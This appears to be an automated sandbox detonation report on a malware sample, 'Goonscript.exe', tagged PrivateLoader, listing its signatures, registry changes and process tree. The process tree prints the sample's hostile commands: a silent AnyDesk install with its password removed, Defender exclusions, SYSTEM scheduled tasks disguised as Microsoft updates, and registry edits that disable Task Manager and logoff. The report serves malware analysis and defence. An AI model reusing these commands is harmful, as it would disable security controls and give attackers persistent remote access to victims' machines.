Analysis Overview
SHA256
d6abd828b52cf392d821adefecf01b16c08c1f2ac97fb7075c3f20d099c5a6d2
Threat Level: Known bad
The file Goonscript.exe was found to be: Known bad.
Malicious Activity Summary
PrivateLoader
Disables Task Manager via registry modification
Command and Scripting Interpreter: PowerShell
Loads dropped DLL
Executes dropped EXE
Checks computer location settings
Checks installed software on the system
Unsigned PE
Enumerates physical storage devices
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of SetWindowsHookEx
Modifies Internet Explorer settings
Modifies registry key
Suspicious behavior: CmdExeWriteProcessMemorySpam
Suspicious use of AdjustPrivilegeToken
Suspicious use of SendNotifyMessage
Creates scheduled task(s)
Suspicious use of FindShellTrayWindow
Uses Task Scheduler COM API
Suspicious behavior: EnumeratesProcesses
Checks processor information in registry
Modifies registry class
Suspicious behavior: AddClipboardFormatListener
Delays execution with timeout.exe
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-09 18:38
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-09 18:38
Reported
2024-05-09 18:40
Platform
win7-20240221-en
Max time kernel
100s
Max time network
104s
Command Line
Signatures
PrivateLoader
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Disables Task Manager via registry modification
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Control Panel\International\Geo\Nation | C:\ProgramData\AnyDesk.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\doorbell-sys.exe | N/A |
| N/A | N/A | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| N/A | N/A | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| N/A | N/A | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\locked.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\wscript.exe | N/A |
| N/A | N/A | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| N/A | N/A | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\Windows\system32\wscript.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Checks installed software on the system
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\ProgramData\AnyDesk.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\ProgramData\AnyDesk.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "29" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\DOMStorage\spankbang.com\ = "29" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "421441773" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000071c834f68b8ed044a0afda50fbc58a7000000000020000000000106600000001000020000000bb37722cf20817b7b0dc7d46be098c152ef441305dc662e503d539b5969f68f0000000000e80000000020000200000009d996f9baf97f521ff34220c7c6ab94dc972269ab27fa833ab27c733c71e80b790000000ef8138affdefe7b2e74f659c9a673dcece7731e14b16d4cabc21de8d2dde79cee61e831f717b28ff4944241ee741b309ac69911ccb3fd66555104884227f1209e147f201bb44a77078d4963ff29de0e15c21a187d04c4039e41de7b942bd21ee302260c8c3e1cec29e3589ea9bfa9c1aa3d0ce80bda6f5381eda330ddbcaa96ef735cac9449129f3112a22d7842ac59340000000c8c238032b22d41d5ddfcf40a52bde9a1a72e9b12b203d271c133193fa0d3e17c4ce07740cfefd5b9371516635bd132c673ca8a1faaaf9d8b8c034bd2caada52 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\DOMStorage\spankbang.com\NumberOfSubdomains = "1" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\SearchScopes | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{51F21011-0E33-11EF-815A-6A55B5C6A64E} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "yes" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\AutoHide = "yes" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\DOMStorage | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\DOMStorage\spankbang.com\Total = "29" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\DOMStorage\spankbang.com | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000071c834f68b8ed044a0afda50fbc58a7000000000020000000000106600000001000020000000aef56000a9325e635ee5c7e8ab4c6739444f10c78e634c943d4b9e8bc19e5b98000000000e80000000020000200000004f5f3782c5a6922c1ec25a277c5c47aab494fc2061c30aa83ebd25f89232ebb320000000473e7a5d71b0f005436c7b3087a5c00e1dd2d81c44e8393496e2daf2759d00944000000088328a5a81bca919e5377338580630649dbf650ee99cd8950041073e53a569791708c6e05ddd1a1ed4f60862221d8d75aff86771c12fa46673dbfbfb25dfc610 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = a0cd931740a2da01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\DefaultIcon | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open\command\ = "\"C:\\ProgramData\\AnyDesk.exe\" \"%1\"" | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open\command | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\DefaultIcon | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open\command\ = "\"C:\\ProgramData\\AnyDesk.exe\" --play \"%1\"" | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\ = "URL:AnyDesk Protocol" | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\URL Protocol | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\DefaultIcon\ = "\"C:\\ProgramData\\AnyDesk.exe\",0" | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\DefaultIcon\ = "AnyDesk.exe,0" | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open\command | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious behavior: CmdExeWriteProcessMemorySpam
| Description | Indicator | Process | Target |
| N/A | N/A | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| N/A | N/A | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| N/A | N/A | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\Goonscript.exe
"C:\Users\Admin\AppData\Local\Temp\Goonscript.exe"
C:\Windows\system32\wscript.exe
"C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\20E9.tmp\20EA.tmp\20EB.vbs //Nologo
C:\Users\Admin\AppData\Roaming\doorbell-sys.exe
"C:\Users\Admin\AppData\Roaming\doorbell-sys.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\21D3.tmp\21D4.tmp\21D5.bat C:\Users\Admin\AppData\Roaming\doorbell-sys.exe"
\??\c:\users\Admin\downloads\AnyDesk.exe
"c:/users/Admin/downloads/Anydesk.exe" --install "C:\ProgramData" --silent
\??\c:\users\Admin\downloads\AnyDesk.exe
"c:\users\Admin\downloads\AnyDesk.exe" --local-service
\??\c:\users\Admin\downloads\AnyDesk.exe
"c:\users\Admin\downloads\AnyDesk.exe" --local-control
C:\ProgramData\AnyDesk.exe
"C:\ProgramData\AnyDesk.exe" --service
C:\ProgramData\AnyDesk.exe
"C:\ProgramData\AnyDesk.exe" --control
C:\ProgramData\AnyDesk.exe
"C:\ProgramData/Anydesk.exe" --remove-password
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://ctt.ac/Y6e79
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1064 CREDAT:275457 /prefetch:2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo DinaOwnsMe "
C:\ProgramData\AnyDesk.exe
"C:\ProgramData/Anydesk.exe" --set-password
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Copy-Item "c:/users/Admin/downloads/stn.exe" -Destination "C:\ProgramData" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Copy-Item "c:/users/Admin/downloads/svchost.exe" -Destination "C:\ProgramData" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Copy-Item "c:/users/Admin/downloads/conhost.exe" -Destination "C:\ProgramData" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Copy-Item "c:/users/Admin/downloads/Anydesk.exe" -Destination "C:\ProgramData" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "c:/users/Admin/downloads/stn.exe" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "c:/users/Admin/downloads/svchost.exe" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "c:/users/Admin/downloads/Anydesk.exe" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "c:/users/Admin/downloads/conhost.exe" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/stn.exe"
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/svchost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/conhost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/Anydesk.exe"
C:\Windows\system32\schtasks.exe
schtasks /Create /TN SystemTaskNavigator /TR "C:\ProgramData/stn.exe" /RL highest /SC ONLOGON /F
C:\Windows\system32\schtasks.exe
schtasks /Create /TN MicrosoftEdgeUpdateTaskList /TR "C:\ProgramData/Anydesk.exe" /RL highest /SC ONLOGON /RU SYSTEM /F
C:\Windows\system32\schtasks.exe
schtasks /Create /TN OneDriveTaskReport /TR "C:\ProgramData/svchost.exe" /RL highest /SC ONLOGON /RU SYSTEM /F
C:\Windows\system32\schtasks.exe
schtasks /Create /TN MicrosoftUpdateScheduler /TR "C:\ProgramData/conhost.exe" /RL highest /SC ONLOGON /RU SYSTEM /F
C:\Windows\system32\timeout.exe
timeout /T 2 /NOBREAK
C:\ProgramData\AnyDesk.exe
"C:\ProgramData/Anydesk.exe" --start
C:\Program Files\VideoLAN\VLC\vlc.exe
"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Roaming\enc1.mp3"
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1064 CREDAT:537611 /prefetch:2
C:\Users\Admin\AppData\Roaming\locked.exe
"C:\Users\Admin\AppData\Roaming\locked.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4D65.tmp\4D66.tmp\4D67.bat C:\Users\Admin\AppData\Roaming\locked.exe"
C:\Windows\system32\reg.exe
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
